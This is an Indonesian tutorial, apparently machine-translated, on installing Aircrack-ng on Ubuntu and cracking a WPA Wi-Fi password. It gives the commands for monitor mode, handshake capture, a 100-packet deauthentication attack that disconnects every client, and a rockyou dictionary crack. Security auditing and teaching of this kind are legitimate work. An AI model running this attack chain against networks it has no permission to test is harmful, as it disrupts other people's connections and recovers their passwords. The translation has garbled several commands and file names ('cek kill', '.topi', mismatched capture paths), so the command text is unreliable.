retakan udara

Instal Aircrack-ng di Ubuntu

Instal Aircrack-ng di Ubuntu
Aircrack-ng adalah seluruh rangkaian alat untuk Audit Keamanan Nirkabel. Ini dapat digunakan untuk memantau, menguji, memecahkan atau menyerang Protokol Keamanan Nirkabel seperti WEP, WPA, WPA2. Aircrack-ng berbasis baris perintah dan tersedia untuk Windows dan Mac OS dan sistem Operasi berbasis Unix lainnya. Aircrack-ng suite berisi banyak alat yang digunakan untuk berbagai tujuan tetapi di sini kita hanya akan melihat beberapa alat penting yang lebih sering digunakan dalam pengujian Keamanan Nirkabel.

Airmon-ng

Airmon-ng digunakan untuk mengelola mode kartu nirkabel dan untuk mematikan proses yang tidak perlu saat menggunakan aircrack-ng. Untuk mengendus koneksi nirkabel, Anda perlu mengubah kartu nirkabel Anda dari mode terkelola ke mode monitor dan airmon-ng digunakan untuk tujuan itu.

Airodump-ng

Airodump-ng adalah sniffer nirkabel yang dapat menangkap data nirkabel dari satu atau lebih Titik Akses nirkabel. Ini digunakan untuk menganalisis Titik Akses terdekat dan untuk menangkap jabat tangan.

Aireplay-ng

Aireplay-ng digunakan untuk serangan replay dan sebagai injektor paket. Ini dapat membuat pengguna tidak mengautentikasi dari AP mereka untuk menangkap jabat tangan.

Airdecap-ng

Airdecap-ng digunakan untuk mendekripsi paket nirkabel WEP, WPA/WPA2 terenkripsi dengan kunci yang diketahui.

Aircrack-ng

Aircrack-ng digunakan untuk menyerang protokol nirkabel WPA/WEP untuk menemukan kuncinya.

Instalasi

Aircrack-ng mudah dipasang di Ubuntu menggunakan APT. Cukup ketik perintah berikut dan ini akan menginstal semua alat yang tersedia di suite Aircrack-ng.

sudo apt-get update
sudo apt-get install -y aircrack-ng

Pemakaian

Pada artikel ini, kita akan melihat sekilas bagaimana menggunakan aircrack-ng untuk memecahkan jaringan nirkabel terenkripsi (TR1CKST3R dalam contoh ini) untuk menemukan kata sandi.

Pertama-tama, buat daftar semua kartu nirkabel yang tersedia yang terhubung ke PC Anda menggunakan perintah 'iwconfig'.

Kami akan menggunakan kartu nirkabel bernama 'wlxc83a35cb4546' untuk tutorial ini (Ini mungkin berbeda dalam kasus Anda). Sekarang, matikan semua proses yang berjalan pada kartu nirkabel menggunakan airmon-ng.

[dilindungi email]:~$ sudo airmon-ng cek kill
Mulai mode Monitor di 'wlxc83a35cb4546' dengan mengetik
[dilindungi email]:~$ sudo airmon-ng start wlxc83a35cb4546

Sekarang, airmon-ng telah memulai mode Monitor pada kartu nirkabel, itu akan muncul sebagai nama yang berbeda 'wlan0mon'. Jalankan 'iwconfig' lagi untuk mencantumkan detail nirkabel.

Kemudian, gunakan airodump-ng untuk melihat Titik Akses Nirkabel terdekat dan propertinya.

[dilindungi email]:~$ sudo airodump-ng wlan0mon

Anda dapat mempersempit pencarian menggunakan filter MAC (-bssid) dan saluran (-c). Untuk menangkap jabat tangan (Handshake berisi kata sandi terenkripsi), kita perlu menyimpan paket kita di suatu tempat menggunakan opsi "-tulis". Tipe,

[dilindungi email]:~$ sudo airodump-ng --bssid 6C:B7:49:FC:62:E4
-c 11 wlan0mon --write /tmp/handshake.topi
--bssid : Alamat MAC Access Point
-c : saluran Access Point [1-13]
--write : Menyimpan paket yang diambil di lokasi yang ditentukan

Sekarang, kita perlu melakukan de-otentikasi setiap perangkat dari Access Point ini menggunakan utilitas Aireplay-ng. Menulis

[dilindungi email]:~$ sudo aireplay-ng -0 100 -a [MAC_ADD] wlan0mon

-a : Tentukan MAC Access Points untuk Aireplay-ng

-0 : Tentukan jumlah paket deauth yang akan dikirim

Setelah beberapa saat, semua perangkat akan terputus dari Access Point itu, ketika mereka mencoba menyambung kembali, menjalankan airodump-ng akan menangkap jabat tangan. Itu akan muncul di bagian atas menjalankan airodump-ng.

Jabat tangan disimpan di direktori '/tmp/', dan berisi kata sandi terenkripsi yang dapat dipaksa offline menggunakan kamus. Untuk memecahkan kata sandi, kami akan menggunakan Aircrack-ng. Tipe

[dilindungi email]:~$ sudo aircrack-ng /tmp/handshake.tutup-01.topi -w
/usr/share/daftar kata/rockyou.txt
-w : Tentukan lokasi kamus

Aircrack-ng akan melihat daftar kata sandi, dan jika ditemukan, itu akan menampilkan kata sandi yang digunakan sebagai kunci.

Dalam hal ini, aircrack-ng menemukan kata sandi yang digunakan '123456789'.

Sekarang, hentikan mode Monitor pada kartu nirkabel dan mulai ulang manajer jaringan.

[dilindungi email]:~$ sudo airmon-ng stop wlan0mon
[dilindungi email]:~$ Sudo service network-manager restart

Kesimpulan

Aircrack-ng dapat digunakan untuk mengaudit Keamanan Nirkabel atau untuk memecahkan kata sandi yang terlupakan. Ada beberapa alat serupa lainnya yang tersedia untuk tujuan ini seperti Kismet tetapi aircrack-ng lebih dikenal karena dukungan yang baik, keserbagunaan dan memiliki berbagai alat. Ini memiliki antarmuka baris perintah yang mudah digunakan yang dapat dengan mudah diotomatisasi menggunakan bahasa skrip apa pun seperti Python.

Shadow of the Tomb Raider untuk Tutorial Linux
Shadow of the Tomb Raider adalah tambahan kedua belas untuk seri Tomb Raider - waralaba game aksi-petualangan yang dibuat oleh Eidos Montreal. Permain...
Cara Meningkatkan FPS di Linux?
FPS adalah singkatan dari Bingkai per detik. Tugas FPS adalah mengukur kecepatan bingkai dalam pemutaran video atau pertunjukan game. Dengan kata sede...
Game Lab Aplikasi Oculus Teratas
Jika Anda adalah pemilik headset Oculus maka Anda harus tahu tentang sideloading. Sideloading adalah proses menginstal konten non-toko di headset Anda...